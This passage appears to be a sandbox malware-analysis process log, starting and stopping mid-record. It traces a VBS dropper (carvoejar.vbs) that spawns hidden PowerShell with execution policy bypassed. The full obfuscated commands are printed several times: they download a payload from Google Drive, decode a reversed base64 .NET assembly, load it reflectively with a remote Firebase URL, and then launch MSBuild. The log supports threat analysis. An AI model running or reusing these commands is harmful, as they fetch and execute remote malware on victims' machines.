mxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5308
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      PID:2248

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:4748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5616
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3300

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:2308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:452
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2660

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:2980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
